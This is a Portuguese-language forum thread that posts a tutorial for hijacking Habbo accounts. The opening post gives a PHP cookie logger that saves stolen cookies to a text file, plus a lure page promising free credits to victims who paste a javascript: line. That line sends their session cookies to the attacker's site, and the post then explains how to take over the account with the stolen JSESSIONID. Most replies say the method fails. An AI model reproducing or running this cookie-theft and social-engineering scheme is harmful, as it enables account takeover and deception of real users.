Xss / vulnerabilidade no security_check do habbo.
+4
Pedro
Jay
Update
Phoenix
8 participantes
- Phoenix
- Posts : 368
Sexo :
Local : Ex-Administrador
Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 09:29
Olá
dia 22 foi descoberto uma vulnerabilidade no habbo, sendo que o "hacker" criando uma pagina mal-intencionada faça que os cookies da vitima seja enviada para ele!
TUTORIAL
1° Proucure um servidor que suporte php e rewrite
recomendo:
freewebhosting!
crie uma conta lá
selecione um endereço convicente para a pagina steal paasswrd
lá crie tudo direitinho e dps va em seu ftp...
o meu no caso é:
eu5org.freewebhostingarea.com/ftp/index.php
como selecionei o eu5.org server,
lá coloque eu5.org no 1° campo e no segudno seu site que criou e embaixo a senha...
entre...
crie um novo arquivo em new file no topo no lado direito da pagina...
no conteudo coloque
tire os
salve com X.php
volte na setinha que tem na parte esquerda..
crie outro arquivo com o nome : cookiejar.txt
salve,
volte...
agora selecione o arquivo cookiejar.txt
e crique em permissões no topo lado direito
agora em chmod nas permissões coloque 777 salve e volte na setinha...
crie um arquivo com o nome de t.php e no conteudo coloque:
tire os
e mude o seusite.com para o site que vc colocou!
agora mande para seus amigos:
seusite.com/t.php
mude seusite.com para o site que vc colokou na hora de cadastrar!
o bobo vai colokar o java na pagina e vai mandar a sessão para o arquivo: cookiejar.txt
va em:
seusite.com/cookiejar.txt
pegue a parte JSESSIONID=PEGUE ESSE CODIGO
va no firefox e baixe no site da mozzila o cookie editor
entre e uma conta fake,
va no cookies editor e mude o cookies jessionid para o da vitima salva o cookie e atualiza a pagina principal!
ta na conta da vitima!
Créditos: Drizer
dia 22 foi descoberto uma vulnerabilidade no habbo, sendo que o "hacker" criando uma pagina mal-intencionada faça que os cookies da vitima seja enviada para ele!
TUTORIAL
1° Proucure um servidor que suporte php e rewrite
recomendo:
freewebhosting!
crie uma conta lá
selecione um endereço convicente para a pagina steal paasswrd
lá crie tudo direitinho e dps va em seu ftp...
o meu no caso é:
eu5org.freewebhostingarea.com/ftp/index.php
como selecionei o eu5.org server,
lá coloque eu5.org no 1° campo e no segudno seu site que criou e embaixo a senha...
entre...
crie um novo arquivo em new file no topo no lado direito da pagina...
no conteudo coloque
tire os
- Código:
<?php
ob_start();
$cookie1=$_GET['cookie1'];
$cookie2=$_GET['cookie2'];
$handle=fopen('cookiejar.txt', 'a');
fwrite($handle, "Cookie: " .$cookie1.$cookie2. "\n");
fclose ($handle);
header("Location: http://habbo.com.br/me");
?>
salve com X.php
volte na setinha que tem na parte esquerda..
crie outro arquivo com o nome : cookiejar.txt
salve,
volte...
agora selecione o arquivo cookiejar.txt
e crique em permissões no topo lado direito
agora em chmod nas permissões coloque 777 salve e volte na setinha...
crie um arquivo com o nome de t.php e no conteudo coloque:
tire os
e mude o seusite.com para o site que vc colocou!
- Código:
<title> Novo Bug </title>
<center>
<b>Copie o codigo abaixo e cole na sua pagina inicial e ganhe 99c!
<font color="red">
javascript:window.location='http://seusite.com/X.php?cookie1='%2bencodeURI(document·cookie.substring(0, 400))%2b'%26cookie2='%2bencodeURI(document·cookie.substring(401, 800));
</font>
agora mande para seus amigos:
seusite.com/t.php
mude seusite.com para o site que vc colokou na hora de cadastrar!
o bobo vai colokar o java na pagina e vai mandar a sessão para o arquivo: cookiejar.txt
va em:
seusite.com/cookiejar.txt
pegue a parte JSESSIONID=PEGUE ESSE CODIGO
va no firefox e baixe no site da mozzila o cookie editor
entre e uma conta fake,
va no cookies editor e mude o cookies jessionid para o da vitima salva o cookie e atualiza a pagina principal!
ta na conta da vitima!
Créditos: Drizer
- Update
- Zodíaco :
Posts : 245
Idade : 25
Sexo :
Local : Em frente ao pc xD
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 11:49
Aff nem funfa,eu executei numa conta fake,n foi pro arquivo cookiejar.txt,e fui tentar entrar na conta fake pra testar denovo,a senha n dava mais,ou seja : Algem Hackeou '
'-' ainda bem q foi a fake '
'-' ainda bem q foi a fake '
- Jay
- Zodíaco :
Posts : 20980
Idade : 2023
Sexo :
Local : 1
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 13:02
Não funciona.
- Pedro
- Zodíaco :
Posts : 675
Idade : 26
Sexo :
Local : Aqui no Forum.
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 13:29
n intendi nada
- Hank
- Zodíaco :
Posts : 597
Idade : 24
Sexo :
Local : \o/
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 13:42
No funfo '-'
- Live
- Zodíaco :
Posts : 197
Idade : 28
Sexo :
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 16:26
Não Funciona :/
- Phoenix
- Posts : 368
Sexo :
Local : Ex-Administrador
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 17:13
Aqui funciona ._. e J-Z se não funciona pode dar closed...
@edit
vocês baixaram o cookie editor no firefox?
@edit
vocês baixaram o cookie editor no firefox?
- Jay
- Zodíaco :
Posts : 20980
Idade : 2023
Sexo :
Local : 1
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 18:01
Não dei closed '-'
OBS: Eles não tão falando que o Cookie Editor não funciona e sim que os cookies não chegam no cookiejar.txt
OBS: Eles não tão falando que o Cookie Editor não funciona e sim que os cookies não chegam no cookiejar.txt
- Pedro
- Zodíaco :
Posts : 675
Idade : 26
Sexo :
Local : Aqui no Forum.
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 18:33
n prescisa dar closed
eu ainda to boiando no ki eh pra fazer
eu ainda to boiando no ki eh pra fazer
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 18:51
Phoenix, por favor apaga o tópico..
sim.. é o Drizer...
sim.. é o Drizer...
- Phoenix
- Posts : 368
Sexo :
Local : Ex-Administrador
Re: Xss / vulnerabilidade no security_check do habbo.
23/11/2010, 19:03
escreveu:Phoenix, por favor apaga o tópico..
sim.. é o Drizer...
No drizer eu confio, mais você não tá on line no habbo, pode ser qualquer trouxa ai me enganando...
Se for você mesmo malz ai então (:
Re: Xss / vulnerabilidade no security_check do habbo.
30/4/2011, 20:33
aff eu fiz tudo correto,mas entrei em fike e eu mesmo colei o codigo e tal,mas fui olhar tinha nada no arquivo cookiejar.txt,poderia corrigir algo errado ai,ou postar o topico denovo porem PERFEITO,vcs são os caras....
Re: Xss / vulnerabilidade no security_check do habbo.
1/5/2011, 14:20
Onde fica esse cookies jessionid ? não achei
Re: Xss / vulnerabilidade no security_check do habbo.
17/5/2011, 17:26
Aki não pegou tentei mais nem funfou tipo nao ta chegando os dados cookiejar.txt, nao chega nada na hora que envia lá
- Dark
- Zodíaco :
Posts : 263
Idade : 27
Sexo :
Local : Nova Prospekt
Re: Xss / vulnerabilidade no security_check do habbo.
17/5/2011, 22:20
Tentei fazer e não funfo
Re: Xss / vulnerabilidade no security_check do habbo.
25/5/2011, 13:19
Funfa sim , o só que o habbo bloqueou o trafico de cookies então o jsessionid não pega mais .-.
Permissões neste sub-fórum
Não podes responder a tópicos